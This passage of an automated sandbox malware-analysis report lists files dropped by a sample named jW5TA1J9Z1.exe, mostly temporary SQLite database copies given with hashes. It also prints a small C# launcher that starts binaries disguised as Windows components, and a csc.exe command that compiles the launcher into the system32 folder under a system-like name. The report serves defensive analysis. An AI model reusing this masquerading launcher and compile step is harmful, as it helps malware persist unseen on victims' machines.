                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\jW5TA1J9Z1.exe.log

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:modified
                                                                    Size (bytes):1396
                                                                    Entropy (8bit):5.350961817021757
                                                                    Encrypted:false
                                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                                    MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                                    SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                                    SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                                    SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                                    Malicious:true
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

                                                                    C:\Users\user\AppData\Local\Temp\01Y3oHG3PZ

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\025sBvClfM

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\02AVn7Ga2T

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\06rEWKD1Vo

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\0MJHK8fX4P

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\0PZnlmVpu5

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\0fn2jk23\0fn2jk23.0.cs

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                    Category:dropped
                                                                    Size (bytes):388
                                                                    Entropy (8bit):4.932211032448267
                                                                    Encrypted:false
                                                                    SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLL3iFkD:JNVQIbSfhV7TiFkMSfhnSFkD
                                                                    MD5:BAD0FD8633120B77C3C9542AC42F7EEE
                                                                    SHA1:7F3764778D18B19031BD0FE2EC54C80D3F14128F
                                                                    SHA-256:837968BD122F35199CBC9D85FAA7C0211A55A6063539A0C7CF4C2E9FFB996394
                                                                    SHA-512:F5E93C8F820D6630F043B3D104D5081A61894F05BA010BFB02F66BCF2B0897E33EE362F533E02F93FB08FB9361205BE9A996DF926B633CFB5AED9F56D05C18D9
                                                                    Malicious:false
                                                                    Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Windows\AppReadiness\RuntimeBroker.exe"); } catch { } }).Start();. }.}.

                                                                    C:\Users\user\AppData\Local\Temp\0fn2jk23\0fn2jk23.cmdline

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):254
                                                                    Entropy (8bit):5.13143441127512
                                                                    Encrypted:false
                                                                    SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8ocNwi23fB:Hu7L//TRq79cQlZZ
                                                                    MD5:A72970F61574E956120829C03E04ECF5
                                                                    SHA1:DDB04DD39AB34459E9A149332C06A9404FEE86F8
                                                                    SHA-256:F941B201CE03E10C3CEA64479079C00935C0016BA5519157CEAB230A7CA860FE
                                                                    SHA-512:A88D802A6D0318E7BDD83799DEEA120DF4D22316DD4D6799867BFBBA5E2AA330D228C8641DD747E59B34EE7EDF4952F0A6293A9DEB656CAA5BBC6931BF941E25
                                                                    Malicious:false
                                                                    Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\0fn2jk23\0fn2jk23.0.cs"

                                                                    C:\Users\user\AppData\Local\Temp\0fn2jk23\0fn2jk23.out

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (337), with CRLF, CR line terminators
                                                                    Category:modified
                                                                    Size (bytes):758
                                                                    Entropy (8bit):5.266909171960612
                                                                    Encrypted:false
                                                                    SSDEEP:12:Ka/I/u7L//TRq79cQlZcKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KwI/un/Vq79tDcKax5DqBVKVrdFAMBJj
                                                                    MD5:58C8BE0A262ED057121AD6A899155F8E
                                                                    SHA1:12ED449430EC7D74B4BF47A4FB07213BE29E8A6C
                                                                    SHA-256:38F2C2C50D55AB1C61252A229EE4CAA07ED4044B471B29A10BE495AD0AE259E7
                                                                    SHA-512:CB6472000E9AC18C17F94318BE564CE7D316D51D8F4610BEB7BEDFC95CA7EBB506B08C52EDF5FFBEB5BBF7148C2EE72C9056DBF625E0DD07FE5792FC3655F476
                                                                    Malicious:false
                                                                    Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\0fn2jk23\0fn2jk23.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                    C:\Users\user\AppData\Local\Temp\0pJalFvoXr

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\0qcb4St5DS

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\1AdXztJ9Gf

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\1Oep9U6TZf

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\1PjWqMaXUe

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\1oz6g7cCLm

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\1wcYOuHGw3

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):25
                                                                    Entropy (8bit):4.163856189774724
                                                                    Encrypted:false
                                                                    SSDEEP:3:bcc1iBmZVLV+n:Pi4h+n
                                                                    MD5:F72C0D28D86B7ED486ACAD860D8F5B64
                                                                    SHA1:AAE5E1B1616A598B027946E05748987610762C2D
                                                                    SHA-256:5734F60690D7EB3E7D618A49F2DBE3124EC9E061EF76D47B50A3B69ED484C778
                                                                    SHA-512:C862A2451C79FC8185C84E27F2796418F91DC5DC16E5D4F83661502DAB72C961F69C689529D083C53D954501481FFDC3AEB37FD104FD251976E75234F6C3E859
                                                                    Malicious:false
                                                                    Preview:1gyfJJW6BPGmYYUUpVs7npsAg

                                                                    C:\Users\user\AppData\Local\Temp\20keVt4Tv3

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\29duMr2DKy

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\2FOyLnkqSh

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\2OkrBFuyx6

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\2ftgGL8bF4

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
